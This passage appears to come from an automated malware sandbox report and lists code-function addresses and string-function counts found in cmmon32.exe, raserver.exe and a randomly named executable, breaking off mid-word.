          Source: C:\Windows\SysWOW64\cmmon32.exe, Code function: 4_2_00EA1530
          Source: C:\Windows\SysWOW64\cmmon32.exe, Code function: 4_2_00F52519
          Source: C:\Windows\SysWOW64\cmmon32.exe, Code function: 4_2_00F41D1B
          Source: C:\Windows\SysWOW64\cmmon32.exe, Code function: 4_2_00F526F8
          Source: C:\Windows\SysWOW64\cmmon32.exe, Code function: 4_2_00F43E96
          Source: C:\Windows\SysWOW64\cmmon32.exe, Code function: 4_2_00EB4E61
          Source: C:\Windows\SysWOW64\cmmon32.exe, Code function: 4_2_00F4CE66
          Source: C:\Windows\SysWOW64\cmmon32.exe, Code function: 4_2_00EB5E70
          Source: C:\Windows\SysWOW64\cmmon32.exe, Code function: 4_2_00EA7640
          Source: C:\Windows\SysWOW64\cmmon32.exe, Code function: 4_2_00EB6611
          Source: C:\Windows\SysWOW64\cmmon32.exe, Code function: 4_2_00E867D0
          Source: C:\Windows\SysWOW64\cmmon32.exe, Code function: 4_2_00F51FCE
          Source: C:\Windows\SysWOW64\cmmon32.exe, Code function: 4_2_00F42782
          Source: C:\Windows\SysWOW64\cmmon32.exe, Code function: 4_2_00EA5790
          Source: C:\Windows\SysWOW64\cmmon32.exe, Code function: 4_2_00F51746
          Source: C:\Windows\SysWOW64\cmmon32.exe, Code function: 4_2_009478F0
          Source: C:\Windows\SysWOW64\cmmon32.exe, Code function: 4_2_009478EE
          Source: C:\Windows\SysWOW64\cmmon32.exe, Code function: 4_2_0095ADD8
          Source: C:\Windows\SysWOW64\cmmon32.exe, Code function: 4_2_00959DF6
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exe, Code function: 17_2_03D713DE
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exe, Code function: 18_2_20250021
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exe, Code function: 18_2_2025E020
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exe, Code function: 18_2_20259810
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exe, Code function: 18_2_202ED016
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exe, Code function: 18_2_20251070
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exe, Code function: 18_2_202D18B6
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exe, Code function: 18_2_2023A080
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exe, Code function: 18_2_202F28E8
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exe, Code function: 18_2_202548CB
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exe, Code function: 18_2_20279906
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exe, Code function: 18_2_20249110
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exe, Code function: 18_2_20257110
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exe, Code function: 18_2_2025594B
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exe, Code function: 18_2_202FD9BE
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exe, Code function: 18_2_20256180
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exe, Code function: 18_2_202F19E2
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exe, Code function: 18_2_202E61DF
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exe, Code function: 18_2_2025523D
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exe, Code function: 18_2_202E0A02
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exe, Code function: 18_2_202FE214
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exe, Code function: 18_2_20254A5B
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exe, Code function: 18_2_202442B0
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exe, Code function: 18_2_202F1A99
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exe, Code function: 18_2_202F22DD
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exe, Code function: 18_2_20248B00
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exe, Code function: 18_2_2024FB40
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exe, Code function: 18_2_20254B96
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exe, Code function: 18_2_2022EBE0
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exe, Code function: 18_2_202563C2
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exe, Code function: 18_2_202DF42B
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exe, Code function: 18_2_2023740C
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exe, Code function: 18_2_20241410
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exe, Code function: 18_2_2025547E
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exe, Code function: 18_2_202F1C9F
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exe, Code function: 18_2_202F2C9A
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exe, Code function: 18_2_202E3490
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exe, Code function: 18_2_202E44EF
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exe, Code function: 18_2_202EDCC5
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exe, Code function: 18_2_202CC53F
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exe, Code function: 18_2_20241530
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exe, Code function: 18_2_202E1D1B
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exe, Code function: 18_2_202F2519
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exe, Code function: 18_2_20220D40
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exe, Code function: 18_2_202CE58A
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exe, Code function: 18_2_202EE581
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exe, Code function: 18_2_202D1DE3
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exe, Code function: 18_2_202DFDDB
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exe, Code function: 18_2_202ED5D2
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exe, Code function: 18_2_20256611
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exe, Code function: 18_2_20254E61
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exe, Code function: 18_2_202ECE66
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exe, Code function: 18_2_20255E70
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exe, Code function: 18_2_20247640
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exe, Code function: 18_2_202E3E96
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exe, Code function: 18_2_202F26F8
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exe, Code function: 18_2_202F1746
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exe, Code function: 18_2_202E2782
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exe, Code function: 18_2_20245790
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exe, Code function: 18_2_202F1FCE
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exe, Code function: 18_2_202267D0
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 19_2_043BF42B
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 19_2_04321410
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 19_2_0431740C
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 19_2_0433547E
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 19_2_043D1C9F
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 19_2_043D2C9A
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 19_2_043C3490
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 19_2_043C44EF
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 19_2_043CDCC5
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 19_2_04321530
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 19_2_043AC53F
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 19_2_043D2519
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 19_2_043C1D1B
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 19_2_04300D40
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 19_2_043AE58A
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 19_2_043CE581
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 19_2_043B1DE3
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 19_2_043BFDDB
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 19_2_043CD5D2
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 19_2_04336611
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 19_2_04335E70
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 19_2_04334E61
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 19_2_043CCE66
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 19_2_04327640
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 19_2_043C3E96
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 19_2_043D26F8
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 19_2_043D1746
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 19_2_04325790
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 19_2_043C2782
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 19_2_043067D0
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 19_2_043D1FCE
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 19_2_04330021
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 19_2_0433E020
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 19_2_04339810
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 19_2_043CD016
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 19_2_04331070
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 19_2_043B18B6
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 19_2_0431A080
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 19_2_043D28E8
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 19_2_043348CB
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 19_2_04337110
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 19_2_04359906
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 19_2_0433594B
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 19_2_043DD9BE
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 19_2_04336180
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 19_2_043D19E2
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 19_2_043C61DF
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 19_2_0433523D
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 19_2_043DE214
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 19_2_043C0A02
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 19_2_04334A5B
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 19_2_043242B0
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 19_2_043D1A99
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 19_2_043D22DD
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 19_2_0432FB40
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 19_2_04334B96
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 19_2_0430EBE0
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 19_2_043363C2
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 19_2_003A78F0
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 19_2_003A78EE
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 19_2_003B9DF6
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 19_2_003BADD8
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exe, Code function: String function: 2027DDE8 appears 49 times
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exe, Code function: String function: 2022B0E0 appears 176 times
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exe, Code function: String function: 202B5110 appears 50 times
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: String function: 04395110 appears 40 times
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: String function: 0430B0E0 appears 176 times
          Source: C:\Windows\SysWOW64\rase